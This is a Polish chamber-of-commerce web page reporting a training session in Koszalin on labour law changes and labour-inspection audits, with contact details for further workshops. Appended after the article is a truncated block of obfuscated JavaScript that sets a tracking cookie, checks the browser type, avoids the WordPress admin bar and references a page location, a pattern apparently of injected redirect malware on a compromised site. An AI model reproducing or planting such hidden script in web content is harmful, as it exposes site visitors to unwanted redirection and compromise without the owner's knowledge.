Relacja ze szkolenia z prawa pracy i kontroli PIP | Północna Izba Gospodarcza w Koszalinie

Północna-Izba-Koszalin-szkolenie-kontrola-PIP-prawo pracy

 

12 kwietnia  br. w Restauracji Maredo w Koszalinie odbyło się szkolenie z zakresu zmian w prawie pracy i kontroli Państwowej Inspekcji Pracy, prowadzone przez Panią Małgorzatę Klowan. Na spotkaniu poruszone zostały zagadnienia związane z kodeksem pracy z uwzględnieniem zmian w przepisach obowiązujących od 2017 r. i w 2018 r.

Szkolenie przybliżyło przedsiębiorcą w przystępny sposób zagadnień prawa pracy oraz wskazanie możliwości sprawnego zastosowania zmieniających się przepisów w codziennym funkcjonowaniu zakładu pracy. Szkolenie miało na celu wyjaśnienie ostatnich zmian przepisów nie tylko od strony teoretycznej, poprzez przytoczenie ich brzmienia, ale przede wszystkim  wskazało drogę praktyczną w prawidłowym ich stosowaniu w tym m.in. dotyczących regulacji umów zlecenia.

Ponadto, z racji doświadczenia zawodowego, prowadząca przybliżyła zagadnienia związane z kontrolą przestrzegania prawa pracy prowadzoną przez Państwową Inspekcję Pracy oraz wskazała drogi zgodnego z prawem przejścia przez procedury kontrolne.

Północna-Izba-Koszalin-szkolenie-kontrola-PIP-prawo pracy

Na prośbę obecnych przedstawicieli firm, poniżej dane do prelegentki.

Jeżeli chcieliby Państwo wziąć udział w warsztatach dotyczących czasu pracy i jego rozliczenia z prawnego aspektu, bardzo prosimy do przesyłania wstępnych zgłoszeń na adres dw@izba.info.

Zachęcamy do zgłaszania tematów szkoleń, jakie Państwo potrzebują. Propozycję prosimy o przesyłanie na adres dw@izba.info lub telefoniczny do Pani Dominiki Wiśniewskiej 733-837-300.

Serdecznie dziękujemy Państwu za udział i zapraszamy na kolejne szkolenia. 

  'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m